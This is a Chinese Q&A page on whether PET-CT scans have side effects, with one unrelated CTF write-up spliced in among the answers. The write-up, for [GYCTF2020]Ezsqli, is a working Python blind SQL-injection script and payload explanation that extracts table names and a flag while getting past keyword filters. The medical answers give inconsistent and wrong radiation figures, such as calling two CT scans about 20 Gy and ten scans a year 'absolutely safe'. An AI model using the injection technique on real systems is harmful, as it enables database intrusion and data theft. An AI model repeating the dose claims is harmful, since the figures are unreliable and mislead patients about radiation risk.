petct检查有副作用吗?

发布网友

我来回答

共5个回答

懂视网

coding:utf-8 import requests import time url = ‘http://14b858fa-e701-47da-a11a-304ef60eb42d.node3.buuoj.cn/‘ def str_hex(s): #十六进制转换 fl ==> 0x666c res = ‘‘ for i in s: res += hex(ord(i)).replace(‘0x‘,‘‘) res = ‘0x‘ + res return res res = ‘‘ for i in range(1,200): print(i) left = 31 right = 127 mid = left + ((right - left)>>1) while left < right: #payload = ‘1^(ascii(substr(database(),{},1))>{})‘.format(i,mid) #爆库 #payload = ‘1^(ascii(substr((select group_concat(table_name) from sys.x$schema_flattened_keys),{},1))>{})‘.format(i,mid) #爆表 #payload = ‘1^(ascii(substr((select group_concat(flag) from f1ag_1s_h3r3_hhhhh),{},1))>{})‘.format(i,mid) #猜测f1ag_1s_h3r3_hhhhh中的列名为flag key = (str_hex(res+chr(mid))) payload = "1 ^ ( (select 1,{}) > (select * from f1ag_1s_h3r3_hhhhh))".format(key) data = { ‘id‘:payload } r = requests.post(url = url, data = data) if r.status_code == 429: print(‘too fast‘) time.sleep(2) if ‘Nu1L‘ in r.text: left = mid + 1 elif ‘Nu1L‘ not in r.text: right = mid mid = left + ((right-left)>>1) if mid == 31 or mid == 127: break #res += chr(mid) #爆表 res += chr(mid-1) #爆flag print(str(mid),res) #give_grandpa_pa_pa_pa #news,users,f1ag_1s_h3r3_hhhhh,users233333333333333 #flag{8ebdb3ac-1d0e-47f3-82d5-ef5b4d20fe70}

因为or被过滤了，information_schema库用不了，使用sys.x$schema_flattened_keys来爆表名

flag的获取有两种方法

第一种：

　　　　直接猜f1ag_1s_h3r3_hhhhh中的列名为flag

第二种：

　　　　爆破

关键payload

1 ^ ( (select 1,1) > (select * from f1ag_1s_h3r3_hhhhh))

这里的1用来探测列数，通过删减1的个数来探测列的数量

 

1 ^ ( (select 1,‘f‘) > (select * from f1ag_1s_h3r3_hhhhh))

原理：

按位去比较，如果爆破字符与flag的第一个字符相等，就向后继续，大了小了都要继续当前的循环，直到找到合适的字符

当小于等于f的时候，是1^0，回显Nu1L，当大于f，即g之类的字符时，是1^1，返回Error Occured When Fetch Result.

所以最后的mid要减一才是正确的字符

这里我们传入十六进制，mysql会自动将十六进制转为字符

mysql不区分大小写，比较的时候O(0x4f)的ascii比f(0x66)的ascii小，但是比较的结果是O比f大 

 

 参考

https://www.gem-love.com/ctf/1782.html

http://www.gr0wth.top/index.php/2020/03/31/gyctf2020ezsqli/

[GYCTF2020]Ezsqli

标签：color   两种   http   用不了   过滤   脚本   select   request   sci   

热心网友

1、一个人每年做一次pet ct检查是非常安全的

　　核医学专家表示：pet ct检查是十分安全的，不用因为担心pet ct副作用而怀疑pet ct检查的良好功效。核医学专业做过测试，一次pet ct检查大概所受的剂量很少，要用放射康复的吸收剂量作为表示，大概有10cGy，这个量非常非常低，不会有大的影响。一个人做了一次pet ct约等于做了一次CT扫描而已。这两次的CT扫描可能也就是20Gy，一年一个人做10次扫描都是绝对安全的。

　　2、pet ct虽有微量辐射，但在体内停留时间短暂

　　当然，pet ct检查的辐射小，并不等于没有辐射，在检查后几个小时，受检者身上会有微量的辐射含量，但18F半衰期时间只有105-115分钟，这么短时间的显影剂的放射性对人体几乎是没影响的，很快就会代谢并随人体的尿液排出，也就是说pet ct检查的副作用小的可以忽略不计，这些核素都有一个半衰期，等到过了三个半衰期以后就没有什么危害，对自己、对周围的亲友都很安全。

　　3、排数多的pet ct设备，相对来说辐射量小

　　其实pet ct检查的副作用大小也取决于设备的先进程度、医生的经验及医院是否属于正规三甲医院。随着医疗技术的不断进步，pet ct也在逐步更新换代，排数多的、速度快的、扫描精确的新兴一代pet ct不断涌现，新一代18F-FDG示踪剂也不断更新，医生的操作与显像剂的调配至关重要。

详见http://petct.lib.gov.cn/

热心网友

应该说PET-CT检查十分安全，有人做过测定，一次CT检查大概所受的剂量很少，要用放射治疗的吸收剂量作为表示，大概有10cGy，这个量非常非常低，不会有大的影响。
PET跟CT是放在一起，PET注射的18F-FDG，现在我们用的最多的是18F-FDG，当然还有其他的核素代替18F-FDG的。这个18F-FDG的剂量相等于同样一次CT扫描的射线剂量。一个人做一次PET-CT辐射量接近一次全身CT的检查量。一年一个人做10次扫描都是绝对安全的。另外，注射进去的18F-FDG是按照公斤、体重计算药量的，大概是每公斤0.14mCi，如果体重120斤，就是60公斤，如果是60—70公斤的体重，大概的放射剂量也就是10mCi。的剂量。早在50年代，中国四部委一块联合下发一个文件，就是说如果体内核素的剂量是100mCi以下是安全的。这些核素都有一个半衰期，等到过了三个半衰期以后就没有什么危害，对自己、对周围的亲友都很安全。

热心网友

　　PET-CT是一项非常安全、无创的检查。不存在药物过敏及个体耐受问题，而且衰败极快，对人体不构成危害，所以说检查时安全的。

热心网友

很多人都担心PET-CT有严重的辐射，总在质疑PET-CT检查的安全性，PET-CT检查安全与否，主要体现在检查前注射的显影剂上。　　目前PET-CT检查使用的显影剂一般为18F-FDG，按0.1 mCi/公斤体重的注射计量来算，一般情况下受检者所注射的放射性显影剂的计量不会超过10mCi。
　　由于现在新型设备的显像效果越来越好，显影剂的注射量也在逐渐减少。
　　此外，18F-FDG半衰期时间只有105-115分钟，这么短的时间显影剂的放射性对人体的危害是可以忽略不计的，所以不用担心PET-CT检查会给受检者带来危害，也就是说，PET-CT检查是相当安全的。